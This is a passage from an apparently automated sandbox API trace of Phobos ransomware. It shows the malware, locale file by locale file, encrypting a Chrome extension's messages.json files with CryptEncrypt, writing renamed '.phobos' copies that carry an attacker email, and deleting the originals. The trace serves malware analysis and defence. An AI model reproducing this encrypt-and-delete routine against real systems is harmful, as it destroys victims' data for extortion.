hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.243] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.243] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.243] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.243] CloseHandle (hObject=0x138) returned 1 [0152.244] CloseHandle (hObject=0x130) returned 1 [0152.244] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json")) returned 1 [0152.245] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.248] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=220) returned 1 [0152.248] CloseHandle (hObject=0x130) returned 1 [0152.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json")) returned 0x2020 [0152.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.248] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.248] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.249] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.249] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.249] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdc, lpOverlapped=0x0) returned 1 [0152.250] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0152.250] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0152.251] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.251] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.251] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.251] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.251] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.252] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.252] CloseHandle (hObject=0x130) returned 1 [0152.252] CloseHandle (hObject=0x138) returned 1 [0152.252] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json")) returned 1 [0152.253] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.253] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=304) returned 1 [0152.253] CloseHandle (hObject=0x138) returned 1 [0152.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json")) returned 0x2020 [0152.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.254] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.254] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.254] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.254] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x130, lpOverlapped=0x0) returned 1 [0152.255] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140, dwBufLen=0x140 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140) returned 1 [0152.255] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x140, lpOverlapped=0x0) returned 1 [0152.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.256] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.256] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.256] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.256] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.256] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.256] CloseHandle (hObject=0x138) returned 1 [0152.256] CloseHandle (hObject=0x130) returned 1 [0152.257] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json")) returned 1 [0152.257] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.258] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=213) returned 1 [0152.258] CloseHandle (hObject=0x130) returned 1 [0152.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json")) returned 0x2020 [0152.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.258] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.258] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.259] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.259] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd5, lpOverlapped=0x0) returned 1 [0152.260] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0152.260] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0152.260] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.260] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.260] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.260] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.261] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.261] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.261] CloseHandle (hObject=0x130) returned 1 [0152.261] CloseHandle (hObject=0x138) returned 1 [0152.261] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json")) returned 1 [0152.262] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.262] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=213) returned 1 [0152.262] CloseHandle (hObject=0x138) returned 1 [0152.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json")) returned 0x2020 [0152.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.263] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.263] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.263] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.263] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd5, lpOverlapped=0x0) returned 1 [0153.195] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0153.195] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0153.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.195] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.195] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.195] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.195] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.196] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.196] CloseHandle (hObject=0x138) returned 1 [0153.196] CloseHandle (hObject=0x130) returned 1 [0153.196] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json")) returned 1 [0153.197] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.197] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=216) returned 1 [0153.197] CloseHandle (hObject=0x130) returned 1 [0153.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: 